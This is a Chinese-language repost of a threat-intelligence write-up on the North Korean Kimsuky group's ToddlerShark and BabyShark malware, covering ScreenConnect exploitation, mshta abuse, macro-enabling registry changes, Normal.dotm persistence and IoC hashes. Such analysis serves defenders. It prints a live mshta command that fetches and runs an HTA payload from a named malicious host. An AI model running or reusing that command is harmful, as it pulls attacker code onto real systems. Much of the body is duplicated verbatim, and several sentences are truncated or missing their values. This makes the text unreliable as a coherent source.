揭开 Kimsuky 黑客的面纱
2024-03-30,
haidragon
https://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247494713&idx=1&sn=da10e98545daabe66e8bdee567d67c69&chksm=c0ccb694e87071043daa2db3e09fc5178cfe4088d002a9c16cdcf95ac8273f21ce9cb36fae49&scene=126&sessionid=1711758738&key=adc69fa84030ff254b0f19fde373ab5bb04f27e9d750fe8857d7978d95775d6291fd690199ed930ca2d3aac5f2f87563406e4056172d2bb718e266b018e579696ac07a98c4ab854379e8491e2833f2288186eb2fbd4cc9469b3ab8f69203a67da7bc1af816f02bd3dc6b6900aed7ad4a583fd5bd7230c778361dce2d1333123c
#Kimsuky #TODDLERSHARK
https://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247494713&idx=1&sn=da10e98545daabe66e8bdee567d67c69&chksm=c0ccb694e87071043daa2db3e09fc5178cfe4088d002a9c16cdcf95ac8273f21ce9cb36fae49&scene=126&sessionid=1711758738&key=adc69fa84030ff254b0f19fde373ab5bb04f27e9d750fe8857d7978d95775d6291fd690199ed930ca2d3aac5f2f87563406e4056172d2bb718e266b018e579696ac07a98c4ab854379e8491e2833f2288186eb2fbd4cc9469b3ab8f69203a67da7bc1af816f02bd3dc6b6900aed7ad4a583fd5bd7230c778361dce2d1333123c
#Kimsuky #TODDLERSHARK
Contents
ToddlerShark 恶意软件是一群威胁行为者,隶属于朝鲜 APT 黑客组织 Kimsuky。他们使用 CVE-2024-1708 和 CVE-2024-1709 用一种名为 ToddlerShark 的新恶意软件变种感染数量目标。他们是一个由朝鲜国家支持的黑客组织,以对世界各地的组织和政府进行网络间谍攻击而闻名。威胁行为者正在利用 2024 年 2 月 20 日披露的身份验证绕过和远程代码执行漏洞,当时 ConnectWise 敦促 ScreenConnect 客户立即将其服务器升级到 23.9.8 或更高版本。
关于 ToddlerShark 的信息收集
恶意软件开发
ToddlerShark 是 Kimsuky、BabyShark 和 ReconShark 后门的新变种。他们以针对美国、欧洲和亚洲的政府组织、研究中心、大学和智库而闻名。黑客首先通过利用漏洞来攻击 ScreenConnect 端点,从而获得初始访问权限,这使他们能够进行身份验证、绕过和代码执行功能。在站稳脚跟后,Kimsuky 使用合法的Microsoft二进制文件(如 mshta.exe)来执行恶意脚本,例如高级混淆 VBS,将其活动与正常系统进程混合在一起。该恶意软件更改了窗口注册表中的 VBAWarnings 键,以允许宏在各种 Microsoft Word 和 Excel 版本上运行,而不会发出通知
创建计划任务以通过定期(每分钟)执行恶意代码来建立持久性。
ToddlerShark 会定期从受感染的设备收集系统信息,包括以下内容:
主机名
系统配置详细信息
用户帐户
活动用户会话
网络配置
已安装安全软件
所有当前网络连接
正在运行的进程的枚举
通过解析常用安装路径和
而且,ToddlerShark 将收集到的信息编码在隐私增强邮件 (PEM) 证书中,泄露到攻击者的命令和控制 (C2) 基础设施,这是一种高级且已知的 Kimsuky 策略。
多态恶意软件
这种新型的恶意使它在许多情况下能够逃避检测并使分析更具挑战性,它通过多种技术实现了 ToddlerShark。首先,它在初始感染步骤中使用的严重混淆的 VBScript 中随机生成函数和变量名称,使静态检测更加困难。大量十六进制编码代码与垃圾代码穿插在一起,可能会使恶意软件有效负载看起来是良性的或不可执行的。
关于 BabyShark 恶意软件变体的信息
BabyShark 是 2018 年推出的旧恶意软件,它们从远程位置执行第一阶段 HTA。他们有不同类型的文件供他们执行,他们有 PR 文件和恶意文件。这里第一个是执行流程
BabyShark 确定至少由美国大学针对的网络钓鱼电子邮件,并存在国家安全问题。这些地图的原始文件名和诱饵内容表明,威胁行为者可能有兴趣收集与朝鲜有关的情报,而且可能更广泛地收集东北亚地区的情报。以下是其他人为我们进行的一些过去调查,以将这些调查分析为我们当前的恶意软件变体和一种新的恶意软件类型,以充分了解它并进行更广泛的威胁搜寻。
分类分析师 BabyShark
WaaSMedicAgent.exe 是与 Windows 更新 Medic Service 相关的可执行文件。它可以由系统或用户调用。其他参数 () 可能特定于 Windows 更新 Medic Service 的操作,也可能是攻击者使用的自定义参数。
53d5d5890514cd89fb4fd773da22badf Mes2Tn/r9kiM1Vv+Mn0a5A.0.1.0.0.0
svchost.exe执行:
svchost.exe 是负责托管多个 Windows 服务的关键系统进程。看到它以各种参数运行是很常见的。这些参数指示所托管的服务类型和某些与安全相关的设置。但是,需要注意的是,由于svchost.exe在系统进程中普遍存在,因此经常成为恶意软件的目标。
-k LocalServiceAndNoImpersonation -p
mshta 执行:
该命令用于执行 HTML 应用程序。在这种情况下,它正在打开一个托管在特定 URL () 上的 HTA 文件。HTA 文件可以执行脚本并可能与本地系统交互。攻击者可利用此漏洞在系统上传递恶意负载或执行任意代码。
mshta
https://tdalpacafarm.com/files/kr/contents/Vkggy0.hta
WINWORD.EXE执行:
Microsoft Word()正在从Office16目录执行。这可以由用户或其他程序启动。由于 Microsoft Word 是处理文档的常用应用程序,因此它的推出并不罕见。
WINWORD.EXE
WINWORD.EXE 打开文档:
最后一个命令指示 Microsoft Word 打开位于用户临时文件夹中的特定文档 ()。该参数建议在不运行任何宏的情况下打开 Word 的新实例,并且该参数指定打开文档的位置。这可能是正常工作流的一部分,也可能用于执行恶意宏(如果文档包含任何宏)。
9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8.docm
/n
/o
WINWORD.EXE的执行:
操作系统启动位于指定路径Microsoft Word (WINWORD.EXE) 的执行:。这将启动 Microsoft Word 应用程序。
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
打开文档:
Microsoft Word 被指示使用参数打开特定文档,后跟文档的路径:。
/n
"C:\Users\admin\AppData\Local\Temp\9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8.docm"
文档执行:
文档由 Microsoft Word 打开。“.docm”扩展名表示这是一个包含宏的Word文档,宏是可以在文档中执行的脚本或程序。
9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8.docm
宏执行:
如果文档包含恶意宏,它们可能会在 Microsoft Word 的上下文中执行。宏能够执行各种操作,例如下载和执行其他恶意软件、修改系统设置、窃取敏感信息或执行其他恶意活动。
潜在影响:
根据恶意宏的性质和攻击者的意图,可能会发生各种恶意操作。例如,恶意软件可能会尝试在受害者的系统上升级权限、泄露数据、安装其他有效负载或执行其他未经授权的活动。
持久性机制:
恶意程序还可能尝试在受害者的系统上建立持久性,以维持访问或控制。这可能涉及修改系统设置、创建新文件或注册表项或安装其他组件,以确保恶意软件即使在系统重新启动后仍保持活动状态。
在我查看注册表更改后,我看到一些攻击者确实编码了,因此我们不知道
如果攻击者有权访问或控制系统,他们可能会利用解码路径 () 中包含的信息进行各种恶意活动。以下是攻击者可能利用此信息的一些潜在方式:
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
恶意宏注入:攻击者可以修改模板文件以包含恶意宏。当用户基于此模板创建或打开文档时,恶意宏将执行,允许攻击者执行下载和执行其他恶意软件、窃取敏感信息或进一步破坏系统等操作。
Normal.dotm
持久性机制:通过修改模板,攻击者可以在受感染的系统上建立持久性。这将确保他们的恶意代码在每次启动 Microsoft Word 或创建新文档时执行,为远程访问或进一步利用提供持久的后门。
Normal.dotm
文档欺骗和网络钓鱼:攻击者可以使用修改后的模板创建令人信服的网络钓鱼文档。对于毫无戒心的用户来说,这些文档可能看起来是合法的,并可能被用来诱骗他们打开恶意附件或点击恶意链接,从而导致恶意软件感染或凭据被盗。
Normal.dotm
文档篡改:攻击者可以篡改模板以修改 Microsoft Word 文档中使用的默认样式、格式或其他设置。这可用于巧妙地操纵文档,可能导致数据丢失、文档损坏或其他不良结果。
Normal.dotm
利用信任关系:由于 Microsoft Word 使用的受信任模板文件,因此用户可能不会怀疑从它创建的文档。攻击者可以利用这种信任关系来增加成功进行社会工程攻击或恶意软件传播的可能性。
Normal.dotm
总体而言,模板文件为寻求利用 Microsoft Word 功能进行恶意目的的攻击者提供了一个有吸引力的目标。用户和组织必须保持警惕,定期更新其安全防御措施,并在处理文档时保持谨慎,尤其是来自不受信任来源的文档。此外,监视和审核对关键系统文件的更改,例如可以帮助检测和缓解潜在的攻击。
Normal.dotm
Normal.dotm
初始行为:
加载第一阶段 HTA:这表示与命令和控制 (C2) 服务器的初始接触点。HTA 文件可以执行脚本,允许攻击者建立通信并可能提供进一步的有效负载或指令。
发送 HTTP GET 请求:BabyShark 与 C2 服务器通信,可能用于检索其他指令或下载有效负载。
解码响应内容:自定义解码器函数可能用于混淆或操作从 C2 服务器接收的数据。通过解码响应,BabyShark 可以解释和执行进一步的命令或操作。
BabyShark VB 脚本:
启用将来的宏:通过修改与 Microsoft Office 应用程序相关的注册表项,BabyShark …
关于 ToddlerShark 的信息收集
恶意软件开发
ToddlerShark 是 Kimsuky、BabyShark 和 ReconShark 后门的新变种。他们以针对美国、欧洲和亚洲的政府组织、研究中心、大学和智库而闻名。黑客首先通过利用漏洞来攻击 ScreenConnect 端点,从而获得初始访问权限,这使他们能够进行身份验证、绕过和代码执行功能。在站稳脚跟后,Kimsuky 使用合法的Microsoft二进制文件(如 mshta.exe)来执行恶意脚本,例如高级混淆 VBS,将其活动与正常系统进程混合在一起。该恶意软件更改了窗口注册表中的 VBAWarnings 键,以允许宏在各种 Microsoft Word 和 Excel 版本上运行,而不会发出通知
创建计划任务以通过定期(每分钟)执行恶意代码来建立持久性。
ToddlerShark 会定期从受感染的设备收集系统信息,包括以下内容:
主机名
系统配置详细信息
用户帐户
活动用户会话
网络配置
已安装安全软件
所有当前网络连接
正在运行的进程的枚举
通过解析常用安装路径和
而且,ToddlerShark 将收集到的信息编码在隐私增强邮件 (PEM) 证书中,泄露到攻击者的命令和控制 (C2) 基础设施,这是一种高级且已知的 Kimsuky 策略。
多态恶意软件
这种新型的恶意使它在许多情况下能够逃避检测并使分析更具挑战性,它通过多种技术实现了 ToddlerShark。首先,它在初始感染步骤中使用的严重混淆的 VBScript 中随机生成函数和变量名称,使静态检测更加困难。大量十六进制编码代码与垃圾代码穿插在一起,可能会使恶意软件有效负载看起来是良性的或不可执行的。
关于 BabyShark 恶意软件变体的信息
BabyShark 是 2018 年推出的旧恶意软件,它们从远程位置执行第一阶段 HTA。他们有不同类型的文件供他们执行,他们有 PR 文件和恶意文件。这里第一个是执行流程
BabyShark 确定至少由美国大学针对的网络钓鱼电子邮件,并存在国家安全问题。这些地图的原始文件名和诱饵内容表明,威胁行为者可能有兴趣收集与朝鲜有关的情报,而且可能更广泛地收集东北亚地区的情报。以下是其他人为我们进行的一些过去调查,以将这些调查分析为我们当前的恶意软件变体和一种新的恶意软件类型,以充分了解它并进行更广泛的威胁搜寻。
分类分析师 BabyShark
WaaSMedicAgent.exe 是与 Windows 更新 Medic Service 相关的可执行文件。它可以由系统或用户调用。其他参数 () 可能特定于 Windows 更新 Medic Service 的操作,也可能是攻击者使用的自定义参数。
53d5d5890514cd89fb4fd773da22badf Mes2Tn/r9kiM1Vv+Mn0a5A.0.1.0.0.0
svchost.exe执行:
svchost.exe 是负责托管多个 Windows 服务的关键系统进程。看到它以各种参数运行是很常见的。这些参数指示所托管的服务类型和某些与安全相关的设置。但是,需要注意的是,由于svchost.exe在系统进程中普遍存在,因此经常成为恶意软件的目标。
-k LocalServiceAndNoImpersonation -p
mshta 执行:
该命令用于执行 HTML 应用程序。在这种情况下,它正在打开一个托管在特定 URL () 上的 HTA 文件。HTA 文件可以执行脚本并可能与本地系统交互。攻击者可利用此漏洞在系统上传递恶意负载或执行任意代码。
mshta
https://tdalpacafarm.com/files/kr/contents/Vkggy0.hta
WINWORD.EXE执行:
Microsoft Word()正在从Office16目录执行。这可以由用户或其他程序启动。由于 Microsoft Word 是处理文档的常用应用程序,因此它的推出并不罕见。
WINWORD.EXE
WINWORD.EXE 打开文档:
最后一个命令指示 Microsoft Word 打开位于用户临时文件夹中的特定文档 ()。该参数建议在不运行任何宏的情况下打开 Word 的新实例,并且该参数指定打开文档的位置。这可能是正常工作流的一部分,也可能用于执行恶意宏(如果文档包含任何宏)。
9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8.docm
/n
/o
WINWORD.EXE的执行:
操作系统启动位于指定路径Microsoft Word (WINWORD.EXE) 的执行:。这将启动 Microsoft Word 应用程序。
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
打开文档:
Microsoft Word 被指示使用参数打开特定文档,后跟文档的路径:。
/n
"C:\Users\admin\AppData\Local\Temp\9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8.docm"
文档执行:
文档由 Microsoft Word 打开。“.docm”扩展名表示这是一个包含宏的Word文档,宏是可以在文档中执行的脚本或程序。
9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8.docm
宏执行:
如果文档包含恶意宏,它们可能会在 Microsoft Word 的上下文中执行。宏能够执行各种操作,例如下载和执行其他恶意软件、修改系统设置、窃取敏感信息或执行其他恶意活动。
潜在影响:
根据恶意宏的性质和攻击者的意图,可能会发生各种恶意操作。例如,恶意软件可能会尝试在受害者的系统上升级权限、泄露数据、安装其他有效负载或执行其他未经授权的活动。
持久性机制:
恶意程序还可能尝试在受害者的系统上建立持久性,以维持访问或控制。这可能涉及修改系统设置、创建新文件或注册表项或安装其他组件,以确保恶意软件即使在系统重新启动后仍保持活动状态。
在我查看注册表更改后,我看到一些攻击者确实编码了,因此我们不知道
如果攻击者有权访问或控制系统,他们可能会利用解码路径 () 中包含的信息进行各种恶意活动。以下是攻击者可能利用此信息的一些潜在方式:
C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
恶意宏注入:攻击者可以修改模板文件以包含恶意宏。当用户基于此模板创建或打开文档时,恶意宏将执行,允许攻击者执行下载和执行其他恶意软件、窃取敏感信息或进一步破坏系统等操作。
Normal.dotm
持久性机制:通过修改模板,攻击者可以在受感染的系统上建立持久性。这将确保他们的恶意代码在每次启动 Microsoft Word 或创建新文档时执行,为远程访问或进一步利用提供持久的后门。
Normal.dotm
文档欺骗和网络钓鱼:攻击者可以使用修改后的模板创建令人信服的网络钓鱼文档。对于毫无戒心的用户来说,这些文档可能看起来是合法的,并可能被用来诱骗他们打开恶意附件或点击恶意链接,从而导致恶意软件感染或凭据被盗。
Normal.dotm
文档篡改:攻击者可以篡改模板以修改 Microsoft Word 文档中使用的默认样式、格式或其他设置。这可用于巧妙地操纵文档,可能导致数据丢失、文档损坏或其他不良结果。
Normal.dotm
利用信任关系:由于 Microsoft Word 使用的受信任模板文件,因此用户可能不会怀疑从它创建的文档。攻击者可以利用这种信任关系来增加成功进行社会工程攻击或恶意软件传播的可能性。
Normal.dotm
总体而言,模板文件为寻求利用 Microsoft Word 功能进行恶意目的的攻击者提供了一个有吸引力的目标。用户和组织必须保持警惕,定期更新其安全防御措施,并在处理文档时保持谨慎,尤其是来自不受信任来源的文档。此外,监视和审核对关键系统文件的更改,例如可以帮助检测和缓解潜在的攻击。
Normal.dotm
Normal.dotm
初始行为:
加载第一阶段 HTA:这表示与命令和控制 (C2) 服务器的初始接触点。HTA 文件可以执行脚本,允许攻击者建立通信并可能提供进一步的有效负载或指令。
发送 HTTP GET 请求:BabyShark 与 C2 服务器通信,可能用于检索其他指令或下载有效负载。
解码响应内容:自定义解码器函数可能用于混淆或操作从 C2 服务器接收的数据。通过解码响应,BabyShark 可以解释和执行进一步的命令或操作。
BabyShark VB 脚本:
启用将来的宏:通过修改与 Microsoft Office 应用程序相关的注册表项,BabyShark …
IoC
1334c087390fb946c894c1863dfc9f0a659f594a3d6307fb48f24c30a23e0fc0
2b6dc1a826a4d5d5de5a30b458e6ed995a4cfb9cad8114d1197541a86905d60e
331d17dbe4ee61d8f2c91d7e4af17fb38102003663872223efaa4a15099554d7
52b898adaaf2da71c5ad6b3dfd3ecf64623bedf505eae51f9769918dbfb6b731
53d5d5890514cd89fb4fd773da22badf
66439f0e377bbe8cda3e516e801a86c64688e7c3dde0287b1bfb298a5bdbc2a2
6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c
7b77112ac7cbb7193bcd891ce48ab2acff35e4f8d523980dff834cb42eaffafa
8ef4bc09a9534910617834457114b9217cac9cb33ae22b37889040cde4cabea6
94a09aff59c0c27d1049509032d5ba05e9285fd522eb20b033b8188e0fee4ff0
9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8
dc425e93e83fe02da9c76b56f6fd286eace282eaad6d8d497e17b3ec4059020a
https://tdalpacafarm.com/files/kr/contents/Vkggy0.hta
2b6dc1a826a4d5d5de5a30b458e6ed995a4cfb9cad8114d1197541a86905d60e
331d17dbe4ee61d8f2c91d7e4af17fb38102003663872223efaa4a15099554d7
52b898adaaf2da71c5ad6b3dfd3ecf64623bedf505eae51f9769918dbfb6b731
53d5d5890514cd89fb4fd773da22badf
66439f0e377bbe8cda3e516e801a86c64688e7c3dde0287b1bfb298a5bdbc2a2
6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c
7b77112ac7cbb7193bcd891ce48ab2acff35e4f8d523980dff834cb42eaffafa
8ef4bc09a9534910617834457114b9217cac9cb33ae22b37889040cde4cabea6
94a09aff59c0c27d1049509032d5ba05e9285fd522eb20b033b8188e0fee4ff0
9d842c9c269345cd3b2a9ce7d338a03ffbf3765661f1ee6d5e178f40d409c3f8
dc425e93e83fe02da9c76b56f6fd286eace282eaad6d8d497e17b3ec4059020a
https://tdalpacafarm.com/files/kr/contents/Vkggy0.hta